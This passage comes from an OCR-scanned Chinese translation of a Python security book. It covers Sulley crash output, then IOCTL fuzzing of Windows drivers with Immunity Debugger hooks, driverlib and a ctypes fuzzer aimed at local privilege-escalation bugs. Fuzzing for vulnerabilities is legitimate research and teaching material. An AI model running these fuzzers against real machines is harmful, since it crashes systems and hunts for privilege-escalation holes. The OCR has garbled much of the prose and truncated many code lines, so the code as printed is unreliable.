MFC42.DLL:5f417247 
MFC42.DLL:5f412adb 
MFC42.DLL:5f401bfd 
MFC42.DLL:5f401b1ic 
MFC42.DLL:5f401a96 
MFCA2.DLL:5f401a20 
MFC42.DLL:5f4019ca 
USER32.d11:77d48709 
USER32.d11:77d487eb 
USER32.d11:77d489a5 
USER32.d11:77d4bccc 
MFCA2.DLL:5f40116f 
SEH unwind: 


00a6fcf4 
00a6fd84 
00a6fdcc 
00a6fe5c 
00a6febc 
00a6ff74 
00a6ffa4 
00a6ffdc 
ffffffff 


-> war-ftpd.exe:0042e38c mov eax,0x43e548 
-> MFC42.DLL:5f41ccfa mov eax,0x5f4be868 
-> MFC42.DLL:5f41cc85 mov eax,0xb5f4be6cO 
-> MFC42.DLL:5f41cc4d mov eax,0x5f4be3d8 
-» USER32.d11:77d70494 push ebp 

-» USER32.d11:77d70494 push ebp 

-> MFC42.DLL:5f424364 mov eax,0x5f4c23b0 
-> MSVCRT.d11:77c35c94 push ebp 

-» kernel32.d11:7c8399f3 push ebp 








Listing 9-3:4437 测试 用 例 产生 的 月 淡 信 息 


Sulley 的 主要 应 用 已 经 讲解 完成 了 。 当 然 这 些 只 是 其 中 的 一 部 分 ， 还 有 很 多 很 多 的 
东西 ， 需要 各 位 同学 ， 自 己 去 研究 ， 比 如 月 淡 数据 的 过 滤 ，primitives 的 图 形 化 输 
出 ， 等 等 。 从 今 以 后 ，Sulley 不 再 是 一 头 可 怕 的 怪物 ， 而 是 我 们 bug-hunging 时 的 
利器 。 在 我 们 成 功 的 完成 了 远程 服务 的 fuzz 以 后 ， 接 下 来 然 我 们 fuzz 本 地 的 
Windows 下 的 驱动 程序 ， 这 次 我 们 用 自 己 的 工具 。 


10 Fuzzing Windows 驱动 


对 于 hacker 来 说 ， 攻 击 Windows 驱动 程序 已 经 不 再 神秘 。 


从 前 ， 驱 动 程序 常 被 远程 浴 出 ， 而 如 今 驱 动 漏洞 越 来 越 多 的 用 于 本 地 提 权 。 在 前 面 
我 们 使 用 Sulley 找 出 了 WarFTPD 的 渝 出 漏洞 。 


WarFTPD 在 远程 的 机 器 上 由 一 个 受 限 的 用 户 和 启动 ， 我 们 在 远程 浴 出 它 之 后 ， 就 会 
获得 一 个 受 限 的 权限 ， 这 个 权限 一 般 是 很 小 的 ， 如 果 似 乎 ， 很 多 信息 都 无 法 获取 ， 
很 多 服务 都 访问 不 了 。 如 果 这 时 候 我 们 拥有 一 个 本 地 驱动 的 exploit， 那 就 能 够 将 
权限 提升 到 系统 级 别 ，you are god now! 


了 驱动 在 内 核 模式 下 运行 ， 而 我 们 的 程序 在 用 户 模 式 下 运行 ， 为 了 在 两 种 模式 之 间 进 
行 交 互 ， 就 要 使 用 IOCTLs (input/output controls ) 。 当 IOCTLs 义理 代码 有 问题 
的 时 候 ， 我 们 就 能 利用 它 获取 系统 权限 。 


接 下 来 ， 我 们 首先 要 介绍 下 如 何 通 过 实现 IOCTLs 来 和 本 地 的 设备 进行 联系 ， 并 且 
尝试 使 用 Immunity 变形 IOCTLs 数据 。 然 后 ， 学 会 使 用 Immunity 提供 的 driverlib 
库 获取 驱动 信 息 ， 以 及 从 一 个 编译 好 的 驱动 文件 中 解码 出 重要 的 控制 流程 ， 设 各 
名 ， 和 IOCTL 代码 。 最 后 用 从 drivelib 获得 的 数据 构建 测试 数据 ， 使 用 

ioctlizer (我 写 的 一 个 驱动 fuzzer) 进行 一 次 driver fuzz. 


10.1 驱动 通信 


几乎 每 个 在 Windows 上 注册 了 的 驱动 程序 都 有 一 个 设备 名 和 一 个 符号 链接 。 用 户 
模式 的 程序 能 够 通过 符号 链接 获得 驱动 的 句柄 ， 然 后 使 用 这 个 句柄 和 驱动 进行 联 
Ro A AS PRAGA 下 四 


HANDLE WINAPI CreateFileW( 
LPCTSTR lpFileName, 
DWORD dwDesiredAccess, 
DWORD dwShareMode, 
LPSECURITY ATTRIBUTES lpSecurityAttribute 
DWORD dwCreationDisposition, 
DWORD dwFlagsAndAttributes, 
HANDLE hTemplateFile 


); 


第 一 个 参数 ， 填 写 文件 名 或 者 设 各 名 ， 这 里 填写 目标 驱动 的 符号 连接 。 
dwDesiredAccess 表示 访问 方式 ， 读 或 者 写 〈 可 以 既 读 又 写 ， 也 可 以 不 读 不 写 ) ， 
GENERIC READ (0x80000000) 读 ，GENERIC_WRITE (0x40000000), 
dwShareMode 这 里 设置 成 0， 表 示 在 CreateFileW 返回 并 且 安 全 关闭 了 句柄 之 
后 ， 才 能 访问 设备 。 IpSecurityAttributes 设置 成 NULL， 表 示 使 用 默认 的 安全 
描述 符 ， 并 且 不 能 被 子 进 程 继承 。dwCcreationDisposition 参数 设置 成 
OPEN EXISTING (0x3)， 表 示 如 果 设 备 存 在 就 打开 ， 其 余 情 况 返 回 错误 。 最 后 两 
个 参数 简 单 的 设置 成 NULL. 


当 CreateFileW 成 功 返 回 一 个 有 效 的 句柄 之 后 ， 我 们 就 能 使 用 
DeviceloControl (由 kernel32.dll 导出 ) 传递 一 个 IOCTL 给 设备 。 


BOOL WINAPI DeviceloControl( 
HANDLE hDevice, 
DWORD dwIoControlCode, 
LPVOID lpInBuffer, 
DWORD nInBufferSize, 
LPVOID lpOutBuffer, 
DWORD nOutBufferSize, 
LPDWORD lpBytesReturned, 
LPOVERLAPPED lpOverlapped 


); 


第 一 个 参数 B CreateFileW 返回 的 句柄 。 dwloControlCode 是 要 传 递 给 设备 

启动 的 IOCTL 代码 。 这 个 代码 决定 了 调用 驱动 中 的 什么 功能 。 参 数 IplnBuffer + 

向 一 个 缓冲 区 ， 包 含 了 将 要 传递 给 驱动 的 数据 。 这 个 缓冲 区 是 我 们 后 面 要 重点 操作 

的 地 方 ，fuzz 数据 将 存在 这 。 nlnBufferSize 为 传递 给 驱动 的 缓冲 区 的 大 小 。 

IpOutBuffer 和 IpOutBufferSize， 和 前 两 个 参 数 一 样 ， 不 过 是 用 于 接收 驱动 返回 的 

IpBytesReturned 为 驱动 实际 返回 的 数据 的 长 度 。 最 后 一 个 参数 简单 的 设置 
NULL。 


现在 对 于 驱动 的 交互 ， 大 家 应 该 不 卫生 了 ， 接 下 来 就 祭 出 我 们 的 Immunity， 用 它 
{= DeviceloControl 然后 变形 输入 缓冲 区 内 的 数据 ， 最 后 fuzzing every 
river。 


10.2 用 Immunity fuzzing 驱动 


我 们 需要 使 用 Immunity 强大 的 调 斌 功能， 挂钩 住 DeviceloControl WAX, TERE! 
ik E 标 驱动 之 前 ， 截 获 它 们 ， 这 就 是 我 们 Driver Fuzzing 的 基础 。 如 果 一 切 顺 利 ， 
最 后 可 以 将 一 些 列 工作 写 出 自动 化 的 PyCommand， 我 们 只 要 喝 着 茶 看 着 
Immunity 完成 一 切 工作 : 截获 DeviceloControl， 变 形 缓冲 区 数据 ， 记 录 相 关 信 
息 ， 将 控制 权 交 还 给 目标 程序 。 之 所 以 要 对 数据 进行 记录 ， 是 因为 每 次 成 功 的 
fuzzing 都 会 引起 系统 奔 江 ， 而 记录 可 以 更 好 的 还 原 朋 溃 时 发 送 的 数据 。 


提示 


确保 不 要 在 自己 的 机 器 上 进行 实验 。 除 非 你 想见 到 无 数 次 的 蓝屏 ， 重 启 ， 最 后 就 是 
硬盘 报销 的 声音 ， 哈 哈 ! 老 天 保 佑 ， 我 们 还 可 以 使 用 虚拟 机 ， 虽 然 它 的 模拟 在 某 些 
底层 细节 上 不 是 很 好 ， 不 过 这 可 比 硬盘 便宜 。 


开动 代码 。 新 建 一 个 Python 脚本 ioctl_fuzzerpy。 


#ioctl_fuzzer.py 
import struct 
import random 
from immlib import * 
class ioctl hook( LogBpHook ): 
def init ( self ): 
self.imm - Debugger() 
self.logfile = "C:\ioctl_log.txt" 
LogBpHook. init ( self ) 
def run( self, regs ): 
We use the following offsets from the ESP register to trap 
ESP+4 -> hDevice 
ESP+8 -> IoControlCode 
ESP+C -> InBuffer 
ESP+10 -> InBufferSize 
ESP+14 -> OutBuffer 
ESP+18 -> OutBufferSize 
ESP+1C -> pBytesReturned 
ESP+20 -> pOverlapped 
in buf = "" 
# read the IOCTL code 
ioctl code = self.imm.readLong( regs['ESP'] + 8 ) 
# read out the InBufferSize 
inbuffer size = self.imm.readLong( regs['ESP'] + 0x10 ) 
4 now we find the buffer in memory to mutate 
inbuffer ptr = self.imm.readLong( regs['ESP'] + OxC ) 
# grab the original buffer 
in buffer - self.imm.readMemory( inbuffer ptr, inbuffer si: 
mutated buffer - self.mutate( inbuffer size ) 
4 write the mutated buffer into memory 


self.imm.writeMemory( inbuffer ptr, mutated buffer ) 
4 save the test case to file 
self.save test case( ioctl code, inbuffer size, in buffer, 
def mutate( self, inbuffer size ): 
counter = 0 
mutated buffer - "" 
# We are simply going to mutate the buffer with random byte 
while counter « inbuffer size: 
mutated buffer += struct.pack( "H", random.randint(0, : 
counter += 1 
return mutated_buffer 
def save test case( self, ioctl code,inbuffer size, in buffer, 
message - Hx kk X | | \n" 
message += "IOCTL Code: 0x%08x\n" 96 ioctl code 
message += "Buffer Size: %d\n" % inbuffer size 
message += "Original Buffer: %s\n" % in buffer 
message += "Mutated Buffer: %s\n" % mutated buffer.encode(' 
message += "***** | |\n\n" 
fd = open( self.logfile, "a" ) 
fd.write( message ) 
fd.close() 
def main(args): 
imm = Debugger() 
deviceiocontrol - imm.getAddress( "kernel32.DeviceloControl" ) 
ioctl hooker - ioctl hook() 
ioctl hooker.add( "9608x" 96 deviceiocontrol, deviceiocontrol ) 
return "[*] IOCTL Fuzzer Ready for Action!" 


剧 = : P 


这 里 没有 用 到 任何 新 的 Immunity 知识 ， 只 是 继承 了 LogBpHook 类 ， 做 了 很 小 的 扩 
R, 这 一 切 都 在 第 五 章 做 了 详细 的 介绍 。 代 码 非常 清晰 明了 ， 显 示 获 得 传递 给 驱动 
的 IOCT 代 码 ， 输 入 缓冲 区 长 度 ， 输 入 缓冲 区 位 置 。 接 着 通过 对 输入 数据 的 变形 ， 
创建 一 个 包含 了 随即 字符 的 新 缓冲 区 ， 长 度 和 输入 缓冲 区 一 样 。 之 后 将 新 缓冲 区 的 
数据 写 入 原 缓冲 区 ， 保 存 测 试 样 例 。 最 后 把 控制 权 交 还 给 用 户 程序 。 


记得 把 ioctl_fuzzer.py KE PyCommands 目录 下 。 这 样 我 们 就 能 使 用 ioctl fuzzer 
命令 fuzz 任何 使 用 IOCTLs 了 的 程序 〈 噢 探 器 ， 防 火 墙 ， 或 者 杀毒 软件 ) 。 表 10- 
1 是 Wireshark 的 fuzz 结果 。 





大 炎炎 火炎 


IOCTL Code: 0x00120003 

Buffer Size: 36 

Original Buffer: 0000000000000000000100000001000000000000000000000( 
Mutated Buffer: a4100338ff334753457078100f 78bde62cdc872747482a5137! 


大 炎炎 火炎 


KKKKK 


IOCTL Code: 0x00001ef0 
Buffer Size: 4 

Original Buffer: 28010000 
Mutated Buffer: abi2d7e6 


KKKKK 





Listing 10-1: Wireshark 的 fuzzing 输出 


在 我 们 将 一 大 堆 的 垃圾 扔 给 驱动 器 之 后 ， 在 于 发 现 了 两 个 可 用 的 
IOCTL 代 码 0x00001ef0 和 0x0012003 。 如 果 要 继续 测试 ， 就 必须 不 断 的 和 用 户 
模式 下 的 Wireshark 进行 交互 ， 这 样 Wireshark 就 会 调用 不 同 IOCTL 代码 ， 最 后 
祈祷 上 帝 让 其 中 一 个 IOCTL 4ER KERB. 


虽然 这 禅 做 很 简单 ， 也 确实 很 够 找 出 漏洞 。 不 过 还 是 不 够 聪明 。 举 个 例子 ， 我 们 并 
不 知 道 正在 fuzzing 的 设备 名 ， (不 过 可 以 通过 hook CreateFileW， 然 后 观察 被 
DeviceloControl 使 用 了 的 句柄 ， 从 而 逆 推 得 到 设备 名 ) ， 而 且 fuzz 的 IOCTL X 
码 并 不 全 ， 我 们 在 用 户 模 式 下 对 程序 进行 的 操作 是 有 限 的 ， 这 样 程序 对 驱动 功能 的 
调用 也 是 有 限 的 。 这 就 像 碰 运 气 。 我 们 期 待 的 是 一 个 更 加 聪明 的 fuzzer， 它 能 对 所 
有 的 IOCTL 不 间断 的 fuzzing， 直 到 你 的 硬盘 报销 ， 或 者 在 这 之 前 发 现 一 个 漏洞 。 


这 可 能 吗 ， 可 能 ， 先 从 我 们 伟大 的 Immunity 携带 的 driverlib 库 开 始 。 使 用 
driverlib 我 们 能 枚 举 出 驱动 程序 所 有 的 设备 名 和 IOCTL 代码 。 把 这 些 结合 起 来 就 
能 够 实现 一 个 高 效 ， 独立 ， 全 自动 化 的 fuzzer 了 ， 这 是 一 个 伟大 的 进步 ， 解 放 双 
F, TERZA. Lets get cracking. 


10.3.1 找 出 设备 名 


用 Immunity 内 建 的 driverlib 库 找 出 设备 名 很 就 当 。 让 我 们 看 看 driverlib 是 怎么 实 
现 这 个 功能 的 。 


def getDeviceNames( self ): 
string list = self.imm.getReferencedStrings( self.module.getCoc 
for entry in string list: 
if "\\Device\\" in entry[2]: 
self.imm.log( "Possible match at address: 0x%08x" % enl 
entry[0] ) 
self.deviceNames.append( entry[2].split("N"")[1] ) 
self.imm.log("Possible device names: %s" % self.deviceNames) 
return self.deviceNames 


‘ — y} 








Listing 10-2: driverlib 库 找 出 设备 名 的 方法 


代码 通过 检索 驱动 中 所 有 被 引用 了 的 字符 串 ， 找 出 其 中 包含 了 "Device Bgsg, 3x 
项 就 可 能 是 驱动 程序 注册 了 的 符号 链接 ， 用 来 让 用 户 模式 下 的 程序 调用 的 。 我 们 就 
使 用 C:\WINDOWS\System32\beep.sys 测试 以 下 看 看 。 以 下 操作 都 在 Immunity 
中 进行 。 


*** Immunity Debugger Python Shell v0.1 

*** Immlib instanciated as 'imm' PyObject READY. 
>>> import driverlib 

>>> driver = driverlib.Driver() 

>>> driver.getDeviceNames() ['\\Device\\Beep' ] 
>>> 


我 们 很 简单 的 使 用 三 行 代 码 就 找到 了 一 个 可 用 的 设备 名 \Device\Beep, 这 省 去 了 我 
们 通 过 反 汇编 一 行 行 查找 代码 的 时 间 。Simple is Beautiful! 下 面 看 看 driverlib 是 
如 何 查找 IOCTL dispatch function (IOCTL 调度 函数 ) #010 IOCTL codes ( 
IOCTL 代码 ) 的 。 


任何 驱动 要 实现 IDCTL 接口 ， 都 必须 有 一 个 IOCTL dispatch 负责 处 理 各 种 IOCTL 
请 求 。 当 了 驱动 被 加 载 的 似乎 后 ， 第 一 个 访问 的 函数 就 是 DriverEntry。DriverEntry 
的 主要 框架 如 下 : 


NTSTATUS DriverEntry(IN PDRIVER OBJECT DriverObject, IN PUNICODE S' 
{ 
UNICODE_STRING uDeviceName; 
UNICODE_STRING uDeviceSymlink; P 
DEVICE_OBJECT gDeviceObject; 
RtlInitUnicodeString( &uDeviceName, L"\\Device\\GrayHat" ); 
RtlInitUnicodeString( &uDeviceSymlink, L"\\DosDevices\\GrayHat' 
// Register the device 
IoCreateDevice( DriverObject, 0, &uDeviceName, FILE DEVICE NETYV 
// We access the driver through its symlink 
IoCreateSymbolicLink(&uDeviceSymlink, &uDeviceName); 
// Setup function pointers 
DriverObject-»-MajorFunction[IRP MJ DEVICE CONTROL] = IOCTLDisp: 
DriverObject->DriverUnload = DriverUnloadCallbac 
DriverObject-»-MajorFunction[IRP MJ CREATE] = DriverCreateClose( 
DriverObject-»-MajorFunction[IRP MJ CLOSE] = DriverCreateCloseC: 
return STATUS. SUCCESS; 


E un 8 
Listing 10-3: DriverEntry 的 C 源码 实现 


这 是 一 个 非常 基础 的 DriverEntry 代码 框架 ， 但 是 很 直观 的 说 明了 设备 是 如 何 初始 
化 的 。 要 注意 的 是 这 行 : 





DriverObject--MajorFunction[IRP MJ DEVICE CONTROL] = IOCTLDispatch 


‘| un "| 








示 驱 动 器 lOCTLDispatch 负责 所 有 IOCTL 请 求 。 当 一 个 驱动 器 编译 完成 


TE 
， 这 行程 序 的 汇编 伪 代 码 如 下 : 


这 
后 
mov dword ptr [REG+70h], CONSTANT 


这 指令 集 看 起 来 有 些 特 殊 ，REG 和 CONSTANT 都 是 汇编 代码 ， IOCTLDispatch 
指针 将 被 存储 在 (REG) 位 移 0x70 的 地 方 上 。 使 用 这 些 指令 ， 我 们 就 
BE fX HH IOCTL 4 38 (& = CONSTANT, t€ lOCTLDispatch, HARR IN 
找 出 IOCTL 代码 。driverlib 的 具体 实 现 如 下 : 


def getIOCTLDispatch( self ): 
search pattern = "MOV DWORD PTR [R32-70], CONST" 
dispatch address = self.imm.searchCommandsOnModule( self.module 
.getCodebase(), search pattern ) 
# We have to weed out some possible bad matches 
for address in dispatch address: 
instruction - self.imm.disasm( address[0] ) 
if "MOV DWORD PTR" in instruction.getResult(): 
if "+70" in instruction.getResult(): 
self.IOCTLDispatchFunctionAddress = instruction.getlImm( 
self.imm.getFunction( self.IOCTLDispatchFunctio 
break 
# return a Function object if successful 
return self.IOCTLDispatchFunction 


[m SaaS SS oe 
Listing 10-4: 找 出 IOCTL dispatch function 的 方法 


最 新 的 Immunity 中 还 下 有 另 一 种 列举 函数 搜索 的 方法 ， 不 过 原理 都 一 样 。 Frid 
Hs | TATARKA, GAST BRAUN RIRE, EAM IOCTL 代码 查找 中 将 会 


Be 


下 面 来 看 看 IOCTL dispatch AIRA EA AY, MARA ARHAR IOCTL 
代码 。 





10.3.3 找 出 IOCTL 代码 


IOCTL dispatch 根据 传 入 的 值 (也 就 是 IOCTL 代码 ) 执 行 相应 的 操作 。 这 也 是 我 们 干 
方 百 计 要 找 出 所 有 IOCTL 的 原因 ， 因 为 IOCTL 就 相当 于 用 Pea RRB A's 
数 "。 让 我 们 先 看 一 段 用 C 实现 的 IOCTL dispatch， 之 后 我 们 反 汇 编 它们 ， 并 从 中 
找 出 IDCTL 代码 。 


NTSTATUS IOCTLDispatch( IN PDEVICE OBJECT DeviceObject, IN PIRP Ir[ 
{ 

ULONG FunctionCode; 

PIO STACK LOCATION IrpSp; 

// Setup code to get the request initialized 

IrpSp = IoGetCurrentIrpStackLocation(Irp); 

FunctionCode = IrpSp-»Parameters.DeviceloControl.IoControlCode, 

// Once the IOCTL code has been determined, perform a 

// specific action 

switch(FunctionCode) 


{ 
case 0x1337: 
// ... Perform action A case 0x1338: 
// ... Perform action B case 0x1339: 
// ... Perform action C 
} 


Irp->IoStatus.Status = STATUS_SUCCESS; 
IoCompleteRequest( Irp, IO NO INCREMENT ); 
return STATUS SUCCESS; 





Listing 10-5: — E& f$ 3€ BY IOCTL dispatch 4X = xz &r = FH IOCTL 4X s 
(0x13370x1338, 0x1339) 


HKM IOCTL 请 求 中 检索 到 IOCTL 代码 的 时 候 ， 就 将 代码 传递 个 switch} 语 
句 ， 然 后 根据 IOCTL 代码 执行 相应 的 操作 。switch 语句 在 汇编 之 后 有 可 能 是 以 下 
两 种 形式 。 


// Series of CMP statements against a constant 

CMP DWORD PTR SS:[EBP-48], 1339 # Test for 0x1339 

JE OxSOMEADDRESS # Jump to 0x1339 action 

CMP DWORD PTR SS:[EBP-48], 1338 # Test for 0x1338 JE OxSOMEADDRESS 
CMP DWORD PTR SS:[EBP-48], 1337 # Test for Ox1337 JE OxSOMEADDRESS 
// Series of SUB instructions decrementing the IOCTL code 

MOV ESI, DWORD PTR DS:[ESI + C] £ Store the IOCTL code in ESI 

SUB ESI, 1337 £ Test for 0x1337 

JE OxSOMEADDRESS # Jump to 0x1337 action SUB ESI, 1 £ Test for Ox1: 
JE OxSOMEADDRESS # Jump to 0x1338 action 

SUB ESI, 1 £ Test for 0x1339 

JE OxSOMEADDRESS # Jump to 0x1339 action 


[^ uM $ 





Listing 10-6: 两 种 不 同 的 switch cates 


switch} 的 反 汇 编 指令 有 很 多 种 ， 不 过 最 常见 的 就 是 上 面 两 种 。 在 第 一 种 情况 下 ， 
我 们 可 以 通过 一 些 列 的 CMP 指令 ， 找 到 进行 比较 的 常量 ， 这 些 就 是 1OCTL 代 
码 。 第 二 种 情 况 ， 稍 微 复杂 点 ， 它 由 一 系列 的 SUB 指 邻接 条 件 跳 转 实现 。 关 键 的 
一 行 如 下 : 


SUB ESI, 1337 


这 一 行 告 诉 了 我 们 ， 最 小 的 IOCTL 代码 就 是 0x1337。 从 这 里 开始 ，0x1337 作为 
第 一 个 常量 ， 每 行 SUB 指令 减 去 多 少 ， 我 能 就 加 上 多 少 ， 每 次 加 出 来 的 新 的 值 作 
为 一 个 新 的 IOCTL 代码 。 不 断 累 加 ， 直 到 switch 结束 。 具 体 实 现 可 以 看 Immunity 
目录 下 的 Libs\driverlib.py. 代码 自动 化 的 找 出 了 IOCTL dispatch 和 所 有 的 IOCTL 
codes。 

现在 driverlib 为 我 们 完成 了 最 脏 最 累 的 活 。 接 下 来 让 我 们 做 些 高 雅 的 事 ! 用 
driverlib 捕捉 驱动 程序 中 所 有 的 设备 名 和 IOCTL 代码 ， 并 且 将 结果 保存 到 Python 
pickle 中 。 接 着 用 它们 构建 IOCTL fuzzer。Let's get fuzzy ! 


10.4 构建 Driver Fuzzer 


第 一 步 在 完成 PyCommand:|OCTL-dump. 


4ioctl dump.py 
import pickle 
import driverlib 
from immlib import * 
def main( args ): 
ioctl list - [] device list - [] 
imm - Debugger() 
driver - driverlib.Driver() 
# Grab the list of IOCTL codes and device names 
ioctl list = driver.getlIOCTLCodes() 
if not len(ioctl list): 
return "[*] ERROR! Couldn't find any IOCTL codes." 
device list = driver.getDeviceNames() 
if not len(device list): 
return "[*] ERROR! Couldn't find any device names." 
4 Now create a keyed dictionary and pickle it to a file 
master list = {} 
master list["ioctl list"] - ioctl list 
master list["device list"] - device list 
filename = "%s.fuzz" % imm.getDebuggedName( ) 
fd - open( filename, "wb" ) 
pickle.dump( master list, fd ) 
fd.close() 
return "[*] SUCCESS! Saved IOCTL codes and device names to %s" 


4 — 
这 个 PyCommand 相当 简单 : 检索 IOCTL 代码 列表 ， 检 索 设 备 名 列表 ， 将 他 们 存 


到 字 典 中 ， 然 后 保存 到 文件 里 。 下 次 我 们 只 要 在 Immunity 的 命令 行 中 简单 的 输入 
lioc dump, pickle 文件 就 会 保存 到 Immunity 目录 下 。 


万 事 俱 各 只 欠 fuzzer。 接 下 来 就 是 coding and coding， 我 们 实现 的 这 个 fuzzer 检 
测 范围 限制 在 内 存 错 误 和 缓冲 区 渝 出 ， 不 过 扩展 也 是 很 容易 的 。 





4my ioctl fuzzer.py 

import pickle 

import sys 

import random 

from ctypes import * 

kernel32 - windll.kernel32 

4 Defines for Win32 API Calls 
GENERIC_READ = 0x80000000 
GENERIC_WRITE = 0x40000000 
OPEN_EXISTING = 0x3 

# Open the pickle and retrieve the dictionary 


fd - open(sys.argv[1], "rb") 
master list - pickle.load(fd) 
ioctl list = master list["ioctl list"] 
device list - master list["device list"] 
fd.close() 
4 Now test that we can retrieve valid handles to all 
# device names, any that don't pass we remove from our test cases 
valid devices - [] 
for device name in device list: 
# Make sure the device is accessed properly 
device file = u"\\\\.\\%s" % device name.split("NN")[::-1][0] 
print "[*] Testing for device: %s" % device file 
driver handle = kernel32.CreateFileW(device file,GENERIC READGE 
if driver handle: 
print "[*] Success! %s is a valid device!" 
if device file not in valid devices: 
valid devices.append( device file ) 
kernel32.CloseHandle( driver handle ) 
else: 
print "[*] Failed! %s NOT a valid device." 
if not len(valid devices): 
print "[*] No valid devices found. Exiting..." 
sys.exit(0) 
4 Now let's begin feeding the driver test cases until we can't be 
4 it anymore! CTRL-C to exit the loop and stop fuzzing 
while 1: 
# Open the log file first 
fd = open("my ioctl fuzzer.log","a") 
# Pick a random device name 
current device = valid devices[random.randint(0O, len(valid dev: 
fd.write("[*] Fuzzing: %s\n" % current device) 
# Pick a random IOCTL code 
current ioctl = ioctl list[random.randint(O, len(ioctl list)-1 
fd.write("[*] With IOCTL: 0x9608xMXn" % current ioctl) 
# Choose a random length current length = random.randint(0, 10( 
# Let's test with a buffer of repeating As 
# Feel free to create your own test cases here 
in buffer - "A" * current length 
# Give the IOCTL run an out buffer 
out buf = (c char * current length)() 
bytes returned - c ulong(current length) 
4 Obtain a handle 
driver handle - kernel32.CreateFileW(device file, GENERIC READ 
fd.write("!!FUZZ! ! Nn") 
# Run the test case 
kernel32.DeviceloControl( driver handle, current ioctl, in buf! 
fd.write( "[*] Test case finished. %d bytes returned.\n\n" % by 
# Close the handle and carry on! 
kernel32.CloseHandle( driver handle ) 
fd.close() 











先 从 pickle 文件 中 取出 包含 IOCTL 代码 和 设备 名 的 字典 。 从 列表 中 找 出 能 够 获得 
句柄 的 设 各 名 。 如果 无 法 获取 ， 就 从 列表 中 移 除 。 接 着 随机 选取 一 个 设备 名 和 
IOCTL 代码 ， 创 建 一 个 随机 长 度 的 缓冲 区 。 最 后 将 IOCTL 发 送 给 驱动 。 


使 用 如 下 命令 进行 fuzzing。 


C:\>python.exe my ioctl fuzzer.py i20mgmt.sys.fuzz 


如 果 fuzzer crash 了 机 器 ， 我 们 能 够 很 准确 的 获得 发 送 的 IOCTL 代码 。 接 着 就 是 
调试 驱 动 了 。 表 10-7 显示 的 就 是 一 个 未 知 驱动 的 fuzzing 过 程 。 


[*] Fuzzing: NN. Nunnamed 

[*] With IOCTL: 0x84002019 

[*] Buffer length: 3277 

! !IFUZZ! ! 

[*] Test case finished. 3277 bytes returned. 
[*] Fuzzing: NN. Nunnamed 

[*] With IOCTL: 0x84002020 

[*] Buffer length: 2137 

! !I'FUZZ! ! 

[*] Test case finished. 1 bytes returned. 
[*] Fuzzing: NN. Nunnamed 

[*] With IOCTL: 0x84002016 

[*] Buffer length: 1097 

! !'FUZZ! ! 

[*] Test case finished. 1097 bytes returned. 
[*] Fuzzing: NN. Nunnamed 

[*] With IOCTL: 0x8400201c 

[*] Buffer length: 9366 

! !IFUZZ! ! 


Listing 10-7: 一 次 成 功 的 fuzzing 记录 


能 够 很 清楚 的 看 到 ， 上 一 个 IDOCTL，0x8400201c 引发 了 系统 月 涡 ， 因 为 这 是 最 后 
一 条 记录 。 目 前 为 止 我 们 的 fuzzer 很 简单 ， 但 是 很 漂亮 ， 可 以 通过 不 断 的 扩展 功 
能 ， 使 它 更 强大 。 其 中 一 个 可 能 的 方法 就 是 ， 将 InBufferLength 或 者 
OutBufferLength 参数 设置 成 和 实际 传人 的 数据 长 度 不 一 样 。 开 始 毁 灭 之 路 吧 ， 哈 
哈 ! ! destroy all drivers in your path! 


11 IDAPYTHON --- IDA 脚本 


IDA Pro( 前 身 为 llfak Guilfanov) 以 其 强大 的 静态 分 析 功 能 当之无愧 的 成 为 逆向 工程 
的 首选 。 让 我 们 记 住 它 的 缔造 者 ，Hex-Rays SA (布鲁塞尔 )。|DA 如 今 已 经 能 够 在 
大 多 数 平台 上 运行 ， 能 够 分 析 大 部 分 平台 的 二 进 制 文件 ， 同 时 提供 了 一 个 内 置 的 调 
试 器 。|DA 的 扩展 能 力也 是 极其 强大 的 ， 提供 了 IDC(IDA 的 脚本 语言 ) 和 SDK( 让 开 
发 者 扩展 方便 IDA 插件 )。 


2004 年 Gergely 和 Ero Carrera 开发 了 IDAPython 插件 ， 将 强大 的 Python 和 IDA 
结合 起 来 ， 使 得 自动 化 分 析 变 得 异常 简单 。 而 如 今 IDAPython 被 广泛 的 使 用 于 各 
种 商业 产品 ( Zynamics 的 BinNavi) 和 开源 工程 (PaiMei 和 PyEm) 中 。 
这 一 章 ， 我 们 要 学 会 IDAPython( 以 IDAPro 5.2 为 目标 ) 的 安装 以 及 重要 的 隙 
数 的 使 用 ， 最 后 通过 几 个 简单 的 例子 进一步 熟悉 IDA 自动 化 分 析 。 


11.1 #2 IDAPython 


2 http://idapython.googlecode.com/files/idapython-1.0.0.zip 下 载 我 们 需要 的 压缩 
包 。 这 个 版 本 比较 早 ， 建 议 大 家 安装 idapython-1.2.0 ida5.4 py2.5 win32.zip 的 
版 本 ， 这 个 版 本 也 可 以 用 于 ida5.5。 


下 载 完 后 解压 缩 ， 将 主 目录 下 的 python 文件 夹 ， 复 制 到 IDA 的 安装 目录 下 (默认 
为 C:\Program Files\IDA) ， 将 plugins 目录 下 python.plw 复制 到 IDA 的 plugins 
目录 下 (默认 为 C:\Program Files\IDA\plugins.) 。 


就 当 的 驱动 I DA， 随 意 加 载 一 个 可 执行 文件 ， 一 旦 初始 化 分 析 完 成 ， 就 会 看 到 底部 
的 输 出 窗口 中 包含 了 IDAPython 的 信息 ， 记 得 不 加 载 文 件 的 时 候 是 不 会 出 现 的 。 
如 图 11-1。 









Loading IDP module C:\Program Files\IDA\procs\pc.w32 for processor metapc...OK 


aded. 
Compiling file 'c: beo id PESNIDANl dc\ida.idc' 
Executing function 'main' 






IDAPython version 1.0.0 final (serial 0) initialized 
Python interpreter version 2.5.2 final (serial 0) 


AU: idle Down (Disk: 9GB 





| New 

(S Open... 

Load file > 
Produce file > 

& IDC file... 

& IDC command... Shift F2 
Python file... Alt+9 
Python command... Alt+8 

圆 Save Ctrl+W 
Save as... 

Close 





Figure 11-1: IDAPython 成 功 安装 之 后 的 IDA Pro 的 初始 化 信息 在 文件 菜单 中 将 会 
看 到 多 出 两 个 选项 ， 如 图 11-2 


Figure 11-2: IDAPython 成 功 安装 后 的 DA Pro 文件 菜单 


连 个 新 的 选项 分 别 是 Python file 和 Python command， 热 键 也 设置 好 了 。 如 果 能 
执行 一 个 简单 的 Python 命令 ， 只 要 单 击 Python command 选项 ， VE 
口 ， 输 入 命令 后 ， 就 会 IDA 的 输出 窗 dl om Python file 选项 用 于 执行 独立 
的 IDAPython 脚本 ， 这 也 是 这 章 要 重点 介绍 的 。 先 IDAPython 已 经 成 功 安装 ， 并 
且 正 常 工作 ， 接 下 来 让 我 们 了 解 下 常用 的 DAPython M WA 


11.2 IDAPython 函数 

